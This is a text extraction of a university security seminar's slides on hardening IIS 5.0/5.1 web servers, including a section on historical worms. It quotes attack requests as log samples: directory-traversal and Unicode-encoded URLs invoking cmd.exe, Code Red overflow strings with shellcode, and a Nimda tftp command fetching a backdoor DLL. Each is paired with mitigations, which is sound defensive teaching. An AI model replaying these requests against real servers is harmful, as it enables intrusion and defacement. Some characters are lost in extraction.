IIS 5'05'1 Security

1
IIS 5.0/5.1 Security

• Laurie Walters
• Lxm30_at_psu.edu
• Security Operations and Services
• A Unit of Information Technology Services

2
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

3
Installing IIS

• IIS Patch must be applied before machine is
  networked!
• It is better to install IIS after operating
  system is secured than while initially setting up
  OS.
• Add / Remove Programs ? Add / Remove Windows
  Components

4
IIS Installation

• By default, the following are installed
• Common Files
• Documentation
• Front Page 2000 Server Extensions
• IIS Snap-In
• SMTP service
• WWW Service
• Do not install Documentation on a production web
  server.
• If you are not using Form Mail, do not install
  SMTP service.

5
IIS Installation

• The following are not installed by default
• FTP Service
• Scripts virtual directory
• Do not install these unless absolutely necessary

6
IIS Installation

• Adds Internet Information Services snap in (ISM)
  and server extension administrator snap in to
  Administrative Tools.
• Adds accounts
• IUSR_MACHINENAME built in account for anonymous
  IIS access
• IWAM_MACHINENAME built in account for out of
  process access

7
Uninstallation of IIS

• Following arent uninstalled
• \Inetpub
• \Systemroot\Help\iishelp
• \Systemroot\system32\inetsrv
• Following users are not removed
• IUSR_Machinename
• IWAM_Machinename

8
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing UP IIS Metabase
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

9
Backing Up IIS Metabase

• The IIS Metabase is similar to the Windows
  registry. It stores configuration entries for
  IIS.
• The Metabase can become corrupted so it should be
  backed up every time a change is made to IIS.

10
Backing Up IIS Metabase

• To backup the Metabase, in the ISM, right click
  on your server icon and select Backup/Restore
  Configuration.
• Click on Create Backup and enter a meaningful
  name.

11
IIS Security Seminar Objectives

• IIS Security
• Backing Up IIS Metabase
• Installation of IIS
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

12
Ways to Overcome Common IIS Breaches Other Than
Patching

• Patching prevents current vulnerabilities

13
Other means than patching help secure against
future vulnerabilities

• Always install IIS on NTFS formatted drives
• Install IIS on separate hard drive or
• Do not allow everyone or the IUSR account to run
  .exe (e.g. cmd.exe) commands
• Use URLScan and IIS Lockdown Tools
• Follow suggested SOS guidelines for securing OS
  and IIS

14
IIS Lockdown Tool

• http//www.microsoft.com/technet/treeview/default.
  asp?url/technet/security/tools/Tools/locktool.asp
  
• Turns off unnecessary services and features of
  IIS.

15
URLScan

• Part of IIS Lockdown tool. It also turns off
  unneeded features and restricts type of HTTP
  requests that the server can process.
• Execute the following command
• Iislockd.exe /q /c tltc\lockdown_files
• It will install urlscan.exe to this folder.
• Run Urlscan.exe to install it.

16
What can be filtered with URLScan

• Request method (verb) e.g. GET, Head, Post, etc.
• File extension of the resource requested
• Suspicious URL encoding
• Presence of non-ASCII characters in the URL
• Presence of specified character sequences in the
  URL
• Presence of specified headers in the request

17
Additional abilities of URLScan 2.5

• Ability to change the log file directory
• Ability to log long URLs
• Ability to restrict the size of requests

18
Securing IIS Manually

• Change permissions on vital files
• Cacls systemroot\.exe /T /G SystemF
  AdministratorsF
• Also change permission for the file command.com
• Do not use Default Web Site
• Stop Administrative Web Site
• Remove IIS Samples and Documentation
• Group all static content separate from scripts,
  executables, etc.
• Remove Unnecessary script mappings

19
Make sure you have the correct version of MDAC

• MDAC provides the underlying functionality for
  database operations, like connecting to remote
  databases and returning data to a client.
• Heap overflow vulnerability in versions 2.6 and
  lower.
• If you do not need MDAC, remove this virtual
  directory from your system. 

20
Removing Unnecessary Script Mappings

• .ida, .idq, .htw Index Services
• .htr web-based Windows Password reset
• .printer Internet Printing Protocol
• .stm, .shtm, .shtml Server-side includes
• .idc database applications

21
Disabling Parent Paths

• Parent Paths allow you to use relative file path
  names (../directory/file.html instead of
  c/directory/file.html).
• The vulnerability in Parent Paths is that they
  can be exploited to move in reverse through file
  structure to get to root of C/,
• Then one can traverse to known file locations
  that are
• more permissive (e.g. C\wwwroot\inetpub\scripts)
  or
• contain goodies (e.g. C\winnt\system32)

22
You can disable parent paths and still use
relative pathnames

• Note It is possible to use relative pathnames
  with some effort.
• (e.g. if your IIS data folder is in a different
  folder than your database and you dont want to
  use absolute pathnames for everything).
• You have to use some coding to make a variable
  for the absolute pathname and use it to implement
  relative pathnames.
• http//www.windowswebsolutions.com/Articles/Index.
  cfm?ArticleID23278

23
Demonstrations

• Manually securing IIS
• IIS Lockdown Tool

24
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing Up IIS Metabase
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

25
IIS Authentication

• To set means of IIS Authentication, right click
  on your web site and select properties, then
  choose the directory security tab. Click on the
  Edit button next to Anonymous access and
  Authentication control.
• Anonymous - uses IUSR_Machinename to anonymously
  access the site
• Integrated Windows users connect to the machine
  with a Windows username and password
• Basic authenticates to machine using
  unencrypted username / password (user accounts
  must have log on locally rights).
• Digest authentication within a W2K domain,
  password hashes compared against DC hashes.
• Kerberos authenticate to a K4 or K5 domain

26
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing Up IIS Metabase
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

27
FTP and SMTP

• Disable SMTP and FTP if not needed if absolutely
  needed, limit access by userid/pw or IP address
• Use other means than FTP if possible (WebDav,
  Terminal Services, etc).
• Allowing totally anonymous connections to machine
  bad idea.
• Specify directory where users can upload/download
  files.
• Create appropriate permissions on files in this
  directory (e.g. remote users can read but not
  write or execute files).

28
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing Up IIS Metabase
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

29
IIS Logging

• Enable extended logging properties in IIS Manager
• W3C Extended Log Format instead of Active Log
• Make sure Date, Time, Server IP, Client IP, URI
  Stem and URI Query are checked
• Daily logs kept in UTC (GMT) format in the
  following location C\Windows\System32\Logfiles\W
  3SVC1\ex020930.txt
• Check the box Use local time for file naming and
  rollover so that logs are kept in EST/EDT
  instead of GMT.

30
IIS Security Seminar Objectives

• IIS Security
• Installation of IIS
• Backing Up IIS Configuration files
• Authentication
• FTP and SMTP
• Securing IIS manually and with IIS Lockdown tool
• Logging
• Common IIS Breaches and how to prevent them

31
Common IIS Breaches

• Buffer Overflows (XXXXXXXXXXXXXXXcode)
• Directory Traversal (../../../cwinnt/system32/cmd
  .exe)
• Canonicalization
• Request unusual action using cmd.exe, .bat
• Encoded using an alternate character set (e.g.
  Unicode) or include character sequences that are
  rarely seen in legitimate requests.
• All of above used for recent worms (e.g.
  IIS/Sadmind, Code Red, Code Red 2, Nimda)

32
Buffer Overflows

• Programs dont check input for appropriate
  length.
• Extra input above and beyond maximum length gets
  attached to CPU execution stack.
• Attackers must carefully program B.O. code to
  identify the location of where it is added the
  stack, so that they can return to this location
  and execute the arbitrary input.

33
Problem with Buffer Overflows in IIS

• IIS process runs in the context of the SYSTEM
  account.
• When a Buffer Overflow is leveraged against IIS,
  arbitrary commands can be run under context of
  SYSTEM user.

34
Canonicalization

• Various file names are equivalent
• E.g. c\directory\file.html, file.html, and
  ..\..\file.html may all refer to the same file
• When some non-static file types are requested via
  a malformed URL, the canonicalization locates the
  correct file, but mixes up the actual location of
  the file.
• Since it determines the file is in a different
  folder than it actually is, it applies incorrect
  permissions.

35
Problem with Canonicalization

• A file in a folder with restricted permissions
  would be requested, however, the permissions
  granted would be of the files ancestors rather
  than actual file permissions
• If parent permissions are less restrictive, the
  attacker could get extra privileges for the
  file.

36
Directory Traversal (Dot Dot Slash)

• Results from inadequate NTFS ACLs on the
  directory or files in question.
• http//www.iistestbox.com/../../../../../winnt/sys
  tem32/cmd.exe

37
Examples of Unicode and Hex Encoding URLS

• Unicode Example Arabic letters
• Hexadecimal Examples
• Space 20
• Plus 2B
• Period 2E
• / 2F
• Colon 3A
• ? 3F
• \ 5C
• 25

38
Hexadecimal use

• Good use of hexadecimal
• http//www.iistestbox.com/files/the20name20o
• f20the20file.txt
• Bad use of hexadecimal
• http//www.iistestbox.com/..2F..2Fwinnt/file.txt
  
• Double decoding of hex
• IIS performs two decodes of HTTP requests that
  traverse executable directories
• 255c
• 1st decode 5c
• 2nd decode \

39
IIS Sadmind Worm

• GET /scripts/../../winnt/system32/cmd.exe /cdir
  200 - 2001-05-06 122019 10.10.10.10 -
  10.20.20.20 80
• GET /scripts/../../winnt/system32/cmd.exe
  /cdir..\ 200 - 2001-05-06 122019 10.10.10.10
  - 10.20.20.20 80 \
• GET /scripts/../../winnt/system32/cmd.exe
  /ccopy\winnt\system32\cmd.exeroot.exe 502 -
  2001-05-06 122019 10.10.10.10 - 10.20.20.20 80
  \
• GET /scripts/root.exe /cecholtHTML code inserted
  heregt.././index.asp 502 -

40
Affects of IIS / Sadmind

• sadmind/IIS worm exploited a vulnerability in
  Solaris systems The Solaris worm created a root
  shell on the infected host and automatically
  attacked other vulnerable Solaris systems.
• It subsequently installed software to attack and
  deface Microsoft IIS web servers

41
Ways to Protect Against IIS Sadmind

• Microsoft Patch MS00-078 to prevent
  Canonicalization
• Disable Parent paths
• Restrict Access to cmd.exe so that it cant be
  used by the worm

42
.printer Buffer Overflow (jill.c)

• .printer Web based control of networked printers
• GET /NULL.printer HTTP/1.0
• Host 420character buffer
• Instead of crashing, IIS automatically restarts
  itself due to Redundancy
• Jill exploits .printer B.O. vulnerability to
  create a remote shell, where attacker can enter
  any command at the following prompt
• C\WINNT\System32gt

43
Ways to protect against Jill B.O.

• Microsoft Patch MS01-023
• If not using IPP,
• Unmap the .printer DLL file extension in IIS so
  that it is not loaded on IIS startup.
• Or, you could delete the file C\Winnt\System32\ms
  w3prt.dll which is the actual file that the
  .printer extension points to.

44
.ida/.idq Buffer Overflow

• .ida provides support for administrative scripts,
  
• .idq provides support for internet data queries
  (Indexing Services)
• .ida/idq B.O works by using .ida to send a
  too-long variable to the idq.dll
• GET /null.ida? 240 character bufferX HTTP/1.1
• IIS process is halted before this even reaches
  Index service, restarts IIS

45
Code Red 1 Worm (Another .ida/.idq worm)

• /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
  NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNu
  9090u6858ucbd3u7801u9090u6858ucbd3
  u7801u9090u6858ucbd3u7801u9090u9090u8190u0
  0c3u0003u8b00u531 bu53ffu0078u0000u00a

46
Affects of Code Red 1

• A machine infected with Code Red 1 scans random
  IP addresses on port 80/TCP looking for other
  hosts to infect.
• Code Red 1 is stored in memory (when machine
  reboots, worm no longer performs scans).
• Web pages on Code Red 1-infected machines may be
  defaced with the following message
• HELLO! Welcome to http//www.worm.com! Hacked By
  Chinese!

47
Ways to Protect Against Code Red 1

• Microsoft Cumulative Patch MS 02-062 (original
  patch MS01-033)
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal

48
Code Red 2

• GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
  XXXXXXXXXu9090u6858ucbd3u7801u9090u6858ucbd
  3u7801 u9090u6858ucbd3u7801u9090u9090u8190
  u00c3u0003u8b0 0u531bu53ffu0078u0000u00a

49
Affects of Code Red 2

• After a successful .ida/.idq B.O., CR2 creates
  threads to scan for new infected hosts for the
  next 24 hours.
• Unlike Code Red I, CR2 is not only
  memory-resident.
• CR2 then copies cmd.exe to the file root.exe in
  the publicly accessible IIS scripts and MSADC
  folders (an intruder may then execute arbitrary
  commands with the privileges of the IIS server
  process).

50
CR2 Contains a Backdoor Trojan

• A Trojan horse copy of explorer.exe is created
  with CR2 and copied to C\ and D\.
• The Trojan horse explorer.exe calls the real
  explorer.exe to mask its existence, and creates a
  virtual mapping which exposes the C and D
  drives.
• On systems not patched against the "Relative
  Shell Path" vulnerability,this Trojan horse copy
  of explorer.exe will run every time a user logs
  in.

51
Ways to Protect Against CR2

• Microsoft Cumulative Patch MS02-062
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal
• Restrict Access to cmd.exe so that it cant be
  used by the worm
• Protect against the"Relative Shell Path"
  vulnerability Microsoft Patch MS02-052

52
Nimda Worm

• Nimda worm sent with an attachment
• pretends to have a "audio/x-wav" content-type
• (Really an executable file).
• If executed, it infects the host, causing various
  files to be replaced with infected copies.
• The worm sends itself out by email, searches for
  open network shares, attempts to copy itself to
  un-patched or vulnerable Microsoft IIS web
  servers, and is a virus infecting both local
  files and files on remote network shares.

53
Nimda

• GET /scripts/root.exe?/cdir
• GET /MSADC/root.exe?/cdir
• GET /c/winnt/system32/cmd.exe?/cdir
• GET /d/winnt/system32/cmd.exe?/cdir
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /_vti_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /_mem_bin/..5c../..5c../..5c../winnt/system
  32/cmd.exe?/cdir
• GET /msadc/..5c../..5c../..5c/..\xc1\x1c../..\x
  c1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc0/../winnt/system32/cmd.exe?/cd
  ir
• GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/
  cdir
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
  r
• GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
  
• GET /scripts/..2f../winnt/system32/cmd.exe?/cdir
  
• Note The first four entries in these sample logs
  denote attempts to connect to the backdoor left
  by Code Red II, while the remaining log entries
  are examples of exploit attempts for the
  Directory Traversal vulnerability.

54
Nimda on IIS Server

• Nimda attempts to install an Admin.dll file in
  the root directory of c\, d\, or e\ (Note that
  the file name Admin.dll may be legitimately
  installed by IIS in other directories.)
• It then scans other systems on port 80,
  attempting to infect them with Nimda

55
Nimda Backdoor

• Attackers send string /ctftp20-i20x.x.x.x20GE
  T20Admin.dll20d\Admin.dll to attempt to
  connect to infected systems.
• A return code of 200 indicates success of this
  command.)

56
Ways to Protect Against Nimda (Email Portion)

• Microsoft Patch for automatic execution of
  previewed files in Outlook (MS01-020)
• Do not open attachments without verification
• Protect against open network shares

57
Ways to Protect Against Nimda (IIS Portion)

• Microsoft Cumulative Patch MS02-062 (Protects
  against both means of Nimda IIS infection Code
  Red 2 Backdoor and Directory Traversal)
• If not using Indexing Services, remove
  application mapping for .ida and .idq
• Install URLScan to deny functionality of any
  request with hexadecimal
• Restrict Access to cmd.exe so that it cant be
  used by the worm
• Protect against the "Relative Shell Path"
  vulnerability of explorer.exe Microsoft Patch
  MS02-052
• Disable Parent Paths

58
IIS Security Seminar Objectives

• Installation of IIS
• Backing Up IIS Configuration files
• Securing IIS manually and with IIS Lockdown tool
• Authentication
• FTP and SMTP
• Logging
• Common IIS Breaches and how to prevent them

59
In Conclusion

• IIS is a big target for skilled hackers as well
  as script kiddies.
• Staying current on patches will help prevent your
  IIS box from being broken in to, however, proper
  locking down will also be highly effective
  against future vulnerabilities.

60
Microsoft Security Guides

• Microsoft Guide to Securing IIS 5
• http//www.microsoft.com/technet/treeview/default
  .asp?url/technet/prodtechnol/iis/tips/iis5chk.asp
  
• Microsoft Guide to Securing Windows 2000
• http//www.microsoft.com/technet/treeview/default
  .asp?url/technet/security/prodtech/windows/secwin
  2k/default.asp

61
Slides and Recommended Guidelines

• Todays Slides, recommended guidelines for IIS,
  Windows 2000 and XP, links to security tools and
  further reading
• http//www.personal.psu.edu/lxm30/windows/windows
  .html

62